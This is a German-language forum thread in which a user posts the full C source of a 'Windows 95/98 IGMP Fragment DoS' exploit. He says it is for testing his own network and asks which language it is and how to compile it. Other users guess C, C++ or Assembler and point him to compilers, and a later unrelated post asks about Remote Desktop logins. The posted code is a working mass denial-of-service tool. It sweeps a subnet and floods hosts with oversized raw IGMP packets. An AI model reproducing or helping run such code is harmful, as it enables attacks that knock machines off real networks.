welche programmiersprache ist das???

Dieses Thema welche programmiersprache ist das??? im Forum "Webentwicklung, Hosting & Programmierung" wurde erstellt von cane, 4. Nov. 2002.

Thema: welche programmiersprache ist das??? hallo leutz! ich teste in meinem netz gerade verschiedene security bugs und versuche sie zu schließen. bis jetzt...

  1. hallo leutz!

    ich teste in meinem netz gerade verschiedene security bugs und versuche sie zu schließen.

    bis jetzt hab ich nur mit fertigen exploits gearbeitet aber heute hab ich einen quelltext gefunden, den ich gerne ausprobieren würde.

    Also:

    1. in welcher sprache ist er geschrieben (ich glaube C, oder?

    2. wie bekomme ich ein fertiges programm raus?

    ich denke ich muß den text kompilieren gibt es ne freeware programmierumgebung für C (wenns C ist?

    der quelltext:

    /* Windows 95 / 98 IGMP Fragment DoS
    * by Michael Stevens
    * http://openbsd.ods.org/
    *
    * Credits to Microsoft Security Website
    */

    #include <stdio.h>
    #include <netdb.h>
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <netinet/in.h>

    int main(int argc, char **argv)
    {
    struct hostent *pHostentry;
    struct sockaddr_in sock;
    int explode,sd,times,x;
    char *tcp_dest;
    unsigned short port;
    char big[20000];
    int y, sleeper = 100000;

    printf(Mass IGMP Nuke by Michael A Stevens\n);

    if (argc < 5)
    {
    printf(usage: %s classc.255 port size repititions\n,argv[0]);
    printf(\n\nexample:\n);
    printf(%s 192.168.0.255 80 8000 10\n,argv[0]);
    exit(1);
    }
    if (argc > 5) sleeper = atoi(argv[5]);

    tcp_dest = argv[1];
    port = atoi(argv[2]);
    explode = atoi(argv[3]);
    times = atoi(argv[4]);

    if ((pHostentry = gethostbyname(tcp_dest)) == NULL)
    {
    printf(Resolve of %s failed please try again.\n, argv[1]);
    exit(1);
    }

    memcpy(&sock.sin_addr.s_addr, pHostentry->h_addr, pHostentry->h_length);

    for (y = 0; y < 255; y++)
    {
    sock.sin_family = AF_INET;
    sock.sin_port = htons(port);
    sock.sin_addr.s_addr -= 16777216;

    if ((sd = socket(AF_INET, SOCK_RAW, 2)) == -1)
    {
    printf(Could not allocate socket.\n);
    exit(1);
    }

    if ( (connect(sd, (struct sockaddr *)&sock, sizeof (sock) )))
    {
    printf(Couldn't connect to %s\n,inet_ntoa(sock.sin_addr.s_addr));
    goto a;
    }

    if ( send(sd, big, explode, 0) == -1)
    {
    printf(Error sending check size (lower)\n);
    close(sd);
    exit(1);
    }

    for (x = 0; x < times; x++)
    {
    usleep(sleeper);
    if (send(sd, big, explode, 0) == -1)
    {
    printf(Error sending.\n);
    exit(1);
    }
    printf(Sent %s packet(%d)\n,inet_ntoa(sock.sin_addr.s_addr),x);

    }

    a:
    close(sd);

    }

    return 0;
    }


    thanks im vorraus
    mfg
    cane
     
  2. hi cane,

    deine vermutung mit c ist gar nicht schlecht. mir sieht es jedoch eher nach c++ aus.
    nen compiler (den brauchst du wie du ja scheinbar schon weißt) um das ding in ein proggie umzuwandeln könntest du evtl. bei borland finden, oder aber du googlest mal ne runde.
    ansonsten schau mal hier:
    http://www.programmersheaven.com/zone3/cat215/16794.htm
    http://www.chiphead.de/pages/revtools.htm
    http://www.philroyle.ukf.net/links.html

    in diesem sinne versuch's einfach mal.
    greetz
    hellslawyer
     
  3. für mich sieht es eher nach Assembler aus. Diese Sprache müssten eigentlich alle Programmiersprachen (C, C++, Pascal, Turbo Pascal, Basic, VBA) verstehen.

    Nur weiss ich nicht, wie man Assembler richtig in die entsprechende Sprache implementiert. Aber ich denke, dass irgendjemand hier sicher einen Antwort weiss.
     
  4. Du hast recht damit, dass man Assembler in andere Programiersprachen einbinden kann, aber Assembler ist es mit Sicherheit nicht... da man in Assembler wirklich ALLES selber machen muss, von der Speicherplatzzuweisung für Variablen über die eigene Implementierung jeglicher Schleifen bis zum Aufräumen des Speichers usw. usf.
    Habe früher aufm 64er mal mit Assembler rumgemacht, und da sahen die Befehle in etwa so aus:

    LDX $4400 (laden des X-Registers mit dem Wert auf Adresse 4400)
    INX (inkrementieren des X-Registers)
    CPX $4500 (Vergleichen des X-Registers mit dem Wert auf Adresse 4500)

    Das ist entweder C oder C++ (Java ist es auch nicht, denn das sieht zwar von der Syntax der Basisfunktionen wie Schleifen, Werzuweisung usw. her ähnlich aus, aber da gibt es doch einige Unterschiede).#

    Greetz
    Michael
     
  5. yup, michael,

    muss dir zustimmen. assembler wäre viel kürzer bei den befehlen und komplexer.... also doch eher c oder c++
     
  6. Vielen Dank an euch alle!!!

    hab ab morgen linux am laufen, da ist glaube ich ein compiler dabei...

    mfg
    cane
     
  7. hallo,

    ich habe ne frage ich habe verschiedene vps und 2 davon mit der gleichen ip aber ne andere portnummer. wenn ich jetzt bei remotedesktop alle vps eingebe und speichere, kann ich immer schön eine ip anwählen und es wird auch gleich der richtige benutzername angezeigt und ich kann mich anmelden...soweit alles ok.

    nur bei den beiden vps mit der gleichen ip aber anderer portnummer z.b 123456:345 und 123456:456 kommt immer wenn ch dann den vps auswähle der gleiche benutzernamen, bzw. der benutzername wird nicht geändert bei wechsel der ip und ich muss dann den richtigen benutzernamen immer eingeben.

    frage kann man das irgendwie speichern, dass bei der anwahl der gleichen ip aber anderer portnummer beim auswählen dann auch der richtige benutzername ausgewählt wird? wie gesagt, bei allen anderen ips gehts super und es wird dann auch immer der richtige benutzername gewählt.

    gruß mario
     
  8. Schon mal einen RDP-Manager versucht?
     
Die Seite wird geladen...

welche programmiersprache ist das??? - Ähnliche Themen

Forum Datum
Welche Programmiersprache? Windows XP Forum 12. Okt. 2011
Welche Programmiersprache...? Software: Empfehlungen, Gesuche & Problemlösungen 29. Apr. 2005
Welches Programm für mkv unter Windows? Audio, Video und Brennen 23. Aug. 2016
Welches ist das letzte kaufbare Office und Fehler beim Scrollen in Word: Text verdoppelt sich Microsoft Office Suite 14. Juli 2016
Kann nicht Booten -welche denn Taste? Windows 10 Forum 8. Feb. 2016